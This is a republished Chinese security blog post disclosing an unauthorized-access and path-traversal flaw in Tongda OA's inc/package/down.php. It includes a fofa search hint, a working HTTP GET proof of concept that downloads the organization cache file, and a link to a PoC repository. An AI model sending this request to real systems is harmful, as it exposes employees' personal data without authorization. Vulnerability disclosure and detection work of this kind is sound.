通达OA down.php接口存在未授权访问漏洞
通达OA(Office Anywhere网络智能办公系统) inc/package/down.php 接口存在未授权访问漏洞,通过此漏洞攻击者构造特殊链接,下载敏感文件,获取企业员工个人信息。fofa
2023-12-1 09:52:3
Author: 网络安全透视镜(查看原文)
阅读量:113
收藏
通达OA(Office Anywhere网络智能办公系统) inc/package/down.php 接口存在未授权访问漏洞,通过此漏洞攻击者构造特殊链接,下载敏感文件,获取企业员工个人信息。
![]()
fofa查询
![]()
POC
GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
![]()
下载后的文件
![]()
![]()
pocsuite3 检测
![]()
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC
![]()
![]()
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498550&idx=2&sn=1a24f13cd5d8bf94159953869bfd045f&chksm=974c5c0ea03bd5188d9c0bd8654ad0777cd85152c27416138ae4b1c16640717490c954de884e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh